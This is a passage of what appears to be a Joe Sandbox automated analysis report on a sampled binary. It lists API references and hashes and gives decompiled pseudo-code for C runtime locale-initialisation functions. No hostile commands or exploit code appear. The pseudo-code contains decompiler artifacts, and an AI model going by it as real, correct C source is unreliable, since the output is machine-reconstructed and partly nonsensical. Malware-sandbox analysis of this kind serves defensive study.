                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92DA
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92F1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9308
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9322
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9339
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9350
                                                          • ___getlocaleinfo.LIBCMT ref: 009B936A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9387
                                                          • ___getlocaleinfo.LIBCMT ref: 009B939E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93B5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93CC
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93FD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9414
                                                          • ___getlocaleinfo.LIBCMT ref: 009B942B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9445
                                                          • ___getlocaleinfo.LIBCMT ref: 009B945C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9473
                                                          • ___getlocaleinfo.LIBCMT ref: 009B948A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94A4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94BB
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94E9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9503
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction ID: 6e8214fe5e7f4c6d73932429b3962ef00e9e2aa88c85c0fbdba6f399621dcba6
                                                          • Opcode Fuzzy Hash: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction Fuzzy Hash: 71F1D9B7E4120D7AE72697F0CD86FEBB7ACA704B40F004622F755E7082FAB4665457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A2B81 Relevance: 40.8, APIs: 27, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E009A2B81(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				signed int _t138;
				void* _t139;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				void* _t174;
				void* _t176;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
				_t146 = _t176 + 1;
				_push(_t139);
				_push(2);
				_push(_t174 - 8);
				_t147 = _t146 | E009B4CB1(_t139, __edi, _t146);
				_t148 = _t147 | E009B4CB1(_t139, __edi, _t147, _t174 - 8, 2, _t139, 0x47, __edi + 0xf8);
				_t149 = _t148 | E009B4CB1(_t139, __edi, _t148, _t174 - 8, 2, _t139, 0x48, __edi + 0xfc);
				_t150 = _t149 | E009B4CB1(_t139, __edi, _t149, _t174 - 8, 2, _t139, 0x49, __edi + 0x100);
				_t151 = _t150 | E009B4CB1(_t139, __edi, _t150, _t174 - 8, 2, _t139, 0x4a, __edi + 0x104);
				_t152 = _t151 | E009B4CB1(_t139, __edi, _t151, _t174 - 8, 2, _t139, 0x4b, __edi + 0x108);
				_t153 = _t152 | E009B4CB1(_t139, __edi, _t152, _t174 - 8, 2, _t139, 0x4c, __edi + 0x10c);
				_t154 = _t153 | E009B4CB1(_t139, __edi, _t153, _t174 - 8, 2, _t139, 0x4d, __edi + 0x110);
				_t155 = _t154 | E009B4CB1(_t139, __edi, _t154, _t174 - 8, 2, _t139, 0x4e, __edi + 0x114);
				_t156 = _t155 | E009B4CB1(_t139, __edi, _t155, _t174 - 8, 2, _t139, 0x4f, __edi + 0x118);
				_t157 = _t156 | E009B4CB1(_t139, __edi, _t156, _t174 - 8, 2, _t139, 0x38, __edi + 0x11c);
				_t158 = _t157 | E009B4CB1(_t139, __edi, _t157, _t174 - 8, 2, _t139, 0x39, __edi + 0x120);
				_t159 = _t158 | E009B4CB1(_t139, __edi, _t158, _t174 - 8, 2, _t139, 0x3a, __edi + 0x124);
				_t160 = _t159 | E009B4CB1(_t139, __edi, _t159, _t174 - 8, 2, _t139, 0x3b, __edi + 0x128);
				_t161 = _t160 | E009B4CB1(_t139, __edi, _t160, _t174 - 8, 2, _t139, 0x3c, __edi + 0x12c);
				_t162 = _t161 | E009B4CB1(_t139, __edi, _t161, _t174 - 8, 2, _t139, 0x3d, __edi + 0x130);
				_t163 = _t162 | E009B4CB1(_t139, __edi, _t162, _t174 - 8, 2, _t139, 0x3e, __edi + 0x134);
				_t164 = _t163 | E009B4CB1(_t139, __edi, _t163, _t174 - 8, 2, _t139, 0x3f, __edi + 0x138);
				_t165 = _t164 | E009B4CB1(_t139, __edi, _t164, _t174 - 8, 2, _t139, 0x40, __edi + 0x13c);
				_t166 = _t165 | E009B4CB1(_t139, __edi, _t165, _t174 - 8, 2, _t139, 0x41, __edi + 0x140);
				_t167 = _t166 | E009B4CB1(_t139, __edi, _t166, _t174 - 8, 2, _t139, 0x42, __edi + 0x144);
				_t168 = _t167 | E009B4CB1(_t139, __edi, _t167, _t174 - 8, 2, _t139, 0x43, __edi + 0x148);
				_t169 = _t168 | E009B4CB1(_t139, __edi, _t168, _t174 - 8, 2, _t139, 0x28, __edi + 0x14c);
				_t170 = _t169 | E009B4CB1(_t139, __edi, _t169, _t174 - 8, 2, _t139, 0x29, __edi + 0x150);
				_t171 = _t170 | E009B4CB1(_t139, __edi, _t170, _t174 - 8, 2, _t139, 0x1f, __edi + 0x154);
				_t172 = _t171 | E009B4CB1(_t139, __edi, _t171, _t174 - 8, 2, _t139, 0x20, __edi + 0x158);
				_t138 = E009B4CB1(_t139, __edi, _t172, _t174 - 8, 2, _t139, 0x1003, __edi + 0x15c) | _t172;
				return _t138;
			}



































                                                          0x009b950d
                                                          0x009b950f
                                                          0x009b9512
                                                          0x009b9513
                                                          0x009b9517
                                                          0x009b9519
                                                          0x009b951f
                                                          0x009b9536
                                                          0x009b9550
                                                          0x009b9567
                                                          0x009b957e
                                                          0x009b9595
                                                          0x009b95af
                                                          0x009b95c6
                                                          0x009b95dd
                                                          0x009b95f4
                                                          0x009b960e
                                                          0x009b9625
                                                          0x009b963c
                                                          0x009b9653
                                                          0x009b966d
                                                          0x009b9684
                                                          0x009b969b
                                                          0x009b96b2
                                                          0x009b96cc
                                                          0x009b96e3
                                                          0x009b96fa
                                                          0x009b9711
                                                          0x009b972b
                                                          0x009b9742
                                                          0x009b9759
                                                          0x009b9770
                                                          0x009b978d
                                                          0x009b9795

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction ID: 095aece78304d225d391e1eee354350efbf9141cb11fa942de95b1040b824b20
                                                          • Opcode Fuzzy Hash: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction Fuzzy Hash: 9381ECB7E4110C7AE72697F08D47FEABBACA704B40F404622F755E7082FAB4A65457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A2703 Relevance: 36.2, APIs: 24, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E009A2703(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _t153;
				void* _t167;
				void* _t180;
				void* _t187;
				char* _t192;
				intOrPtr* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				intOrPtr* _t218;
				char* _t220;
				void* _t221;
				void* _t222;

				_t180 = __ebx;
				_t222 = _t221 + 1;
				asm("in al, dx");
				_push(1);
				_t198 = E009B4CB1(__ebx, __edi, __esi);
				_t199 = _t198 | E009B4CB1(__ebx, __edi, _t198, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
				_t200 = _t199 | E009B4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
				_t201 = _t200 | E009B4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
				 *((intOrPtr*)(_t222 - 0xc)) =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
				_t202 = _t201 | E009B4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x18,  *((intOrPtr*)(_t222 + 8)) + 0x1c);
				_t203 = _t202 | E009B4CB1(__ebx, __edi, _t202, _t222 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x20);
				_t204 = _t203 | E009B4CB1(__ebx, __edi, _t203, _t222 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x24);
				_t205 = _t204 | E009B4CB1(__ebx, __edi, _t204, _t222 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t222 + 8)) + 0x28);
				_t206 = _t205 | E009B4CB1(__ebx, __edi, _t205, _t222 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t222 + 8)) + 0x29);
				_t207 = _t206 | E009B4CB1(__ebx, __edi, _t206, _t222 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t222 + 8)) + 0x2a);
				_t208 = _t207 | E009B4CB1(__ebx, __edi, _t207, _t222 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t222 + 8)) + 0x2b);
				_t209 = _t208 | E009B4CB1(__ebx, __edi, _t208, _t222 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t222 + 8)) + 0x2c);
				_t210 = _t209 | E009B4CB1(__ebx, __edi, _t209, _t222 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t222 + 8)) + 0x2d);
				_t211 = _t210 | E009B4CB1(__ebx, __edi, _t210, _t222 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t222 + 8)) + 0x2e);
				_t212 = _t211 | E009B4CB1(__ebx, __edi, _t211, _t222 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t222 + 8)) + 0x2f);
				_t213 = _t212 | E009B4CB1(__ebx, __edi, _t212, _t222 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t222 + 8)) + 0x38);
				_t214 = _t213 | E009B4CB1(__ebx, __edi, _t213, _t222 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x3c);
				_t215 = _t214 | E009B4CB1(__ebx, __edi, _t214, _t222 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x40);
				_t216 = _t215 | E009B4CB1(__ebx, __edi, _t215, _t222 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x44);
				_t217 = _t216 | E009B4CB1(__ebx, __edi, _t216, _t222 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x48);
				if((E009B4CB1(__ebx, __edi, _t217, _t222 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x4c) | _t217) == 0) {
					_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0xc))));
					while( *_t192 != 0) {
						_t153 =  *_t192;
						if(_t153 < 0x30 || _t153 > 0x39) {
							if(_t153 != 0x3b) {
								goto L8;
							} else {
								_t220 = _t192;
								do {
									 *_t220 =  *((intOrPtr*)(_t220 + 1));
									_t220 = _t220 + 1;
								} while ( *_t220 != 0);
								continue;
							}
							L19:
							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
								asm("lock xadd [eax], ecx");
								if(_t187 == 1) {
									E009B2248( *((intOrPtr*)(_t180 + 0x84)));
									E009B2248( *((intOrPtr*)(_t180 + 0x78)));
								}
							}
							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t222 - 4));
							_t167 = 0;
							 *((intOrPtr*)(_t180 + 0x80)) = _t195;
							 *((intOrPtr*)(_t180 + 0x84)) = _t218;
							goto L23;
						} else {
							 *_t192 = _t153 - 0x30;
							L8:
							_t192 = _t192 + 1;
						}
					}
					_t218 =  *((intOrPtr*)(_t222 + 8));
					_t195 =  *((intOrPtr*)(_t222 - 8));
					 *_t218 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
					 *((intOrPtr*)(_t218 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
					 *((intOrPtr*)(_t218 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
					 *((intOrPtr*)(_t218 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
					 *((intOrPtr*)(_t218 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t222 - 4)))) = 1;
					if(_t195 != 0) {
						 *_t195 = 1;
					}
					_t187 = 0xffffffffffffffff;
					if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
						asm("lock xadd [edx], eax");
					}
					goto L19;
				} else {
					E009B842D( *((intOrPtr*)(_t222 + 8)));
					E009B2248( *((intOrPtr*)(_t222 + 8)));
					E009B2248( *((intOrPtr*)(_t222 - 4)));
					E009B2248( *((intOrPtr*)(_t222 - 8)));
					_t167 = 1;
				}
				L23:
				return _t167;
			}

































                                                          0x009a2703
                                                          0x009b85d4
                                                          0x009b85d5
                                                          0x009b85d6
                                                          0x009b85e1
                                                          0x009b85f5
                                                          0x009b860c
                                                          0x009b8626
                                                          0x009b862e
                                                          0x009b8640
                                                          0x009b8657
                                                          0x009b866e
                                                          0x009b8688
                                                          0x009b869f
                                                          0x009b86b6
                                                          0x009b86cd
                                                          0x009b86e7
                                                          0x009b86fe
                                                          0x009b8715
                                                          0x009b872c
                                                          0x009b8746
                                                          0x009b875d
                                                          0x009b8774
                                                          0x009b878b
                                                          0x009b87a5
                                                          0x009b87c1
                                                          0x009b87ef
                                                          0x009b8802
                                                          0x009b87f3
                                                          0x009b87f7
                                                          0x009b880b
                                                          0x00000000
                                                          0x009b880d
                                                          0x009b880d
                                                          0x009b880f
                                                          0x009b8812
                                                          0x009b8814
                                                          0x009b8817
                                                          0x00000000
                                                          0x009b881c
                                                          0x009b888c
                                                          0x009b8891
                                                          0x009b8893
                                                          0x009b8898
                                                          0x009b88a0
                                                          0x009b88a8
                                                          0x009b88ae
                                                          0x009b8898
                                                          0x009b88b2
                                                          0x009b88b5
                                                          0x009b88b7
                                                          0x009b88bd
                                                          0x00000000
                                                          0x009b87fd
                                                          0x009b87ff
                                                          0x009b8801
                                                          0x009b8801
                                                          0x009b8801
                                                          0x009b87f7
                                                          0x009b8833
                                                          0x009b8837
                                                          0x009b883c
                                                          0x009b8847
                                                          0x009b8853
                                                          0x009b885f
                                                          0x009b886b
                                                          0x009b8871
                                                          0x009b8875
                                                          0x009b8877
                                                          0x009b8877
                                                          0x009b887f
                                                          0x009b8884
                                                          0x009b8888
                                                          0x009b8888
                                                          0x00000000
                                                          0x009b87c3
                                                          0x009b87c7
                                                          0x009b87cd
                                                          0x009b87d6
                                                          0x009b87df
                                                          0x009b8575
                                                          0x009b8575
                                                          0x009b88c3
                                                          0x009b88c9

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85D9
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85F0
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8607
                                                          • ___getlocaleinfo.LIBCMT ref: 009B861E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B863B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8652
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8669
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8680
                                                          • ___getlocaleinfo.LIBCMT ref: 009B869A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86B1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86C8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86DF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86F9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8710
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8727
                                                          • ___getlocaleinfo.LIBCMT ref: 009B873E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8758
                                                          • ___getlocaleinfo.LIBCMT ref: 009B876F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8786
                                                          • ___getlocaleinfo.LIBCMT ref: 009B879D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B87B7
                                                          • _free.LIBCMT ref: 009B87CD
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • _free.LIBCMT ref: 009B87D6
                                                          • _free.LIBCMT ref: 009B87DF
                                                          • _free.LIBCMT ref: 009B88A0
                                                          • _free.LIBCMT ref: 009B88A8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8448
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B845A
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B846C
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B847E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8490
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84A2
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84B4
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84C6
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84D8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84EA
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84FC
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B850E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8520
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                                                          • String ID:
                                                          • API String ID: 129311744-0
                                                          • Opcode ID: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction ID: ec7e1f363432fbeafe564d2c9f603ed1537927bb5a0de419b043ff16894b443a
                                                          • Opcode Fuzzy Hash: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction Fuzzy Hash: 866113B2E402087AEB30DBA8CD46FEF7BEC9B48B85F144510FA44FB182D5A4DA509675
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A1118 Relevance: 13.6, APIs: 9, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E009A1118(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr __edi, void* __esi) {
				intOrPtr* _t37;
				signed int _t40;
				char _t58;
				void* _t69;
				signed int _t78;
				signed int _t79;
				char* _t86;
				intOrPtr* _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				char* _t99;
				void* _t100;

				_t69 = __ebx;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)(__edx + 4)) + __ecx;
				_t37 = E009B22C8(__edx, 4);
				 *((intOrPtr*)(_t100 - 0xc)) = _t37;
				if(_t37 == 0) {
					L5:
					E009B2248( *((intOrPtr*)(_t100 + 8)));
					E009B2248( *(_t100 - 4));
					_t40 =  *(_t100 - 8);
				} else {
					 *_t37 = __edi;
					_t90 =  *((intOrPtr*)(__ebx + 0xb0));
					_t94 = E009B4CB1(__ebx,  *((intOrPtr*)(__ebx + 0xb0)), __esi, _t100 - 0x14, 1,  *((intOrPtr*)(__ebx + 0xb0)), 0xe,  *((intOrPtr*)(_t100 + 8)));
					_t95 = _t94 | E009B4CB1(__ebx,  *((intOrPtr*)(__ebx + 0xb0)), _t94, _t100 - 0x14, 1, _t90, 0xf,  *((intOrPtr*)(_t100 + 8)) + 4);
					 *(_t100 - 8) =  *((intOrPtr*)(_t100 + 8)) + 8;
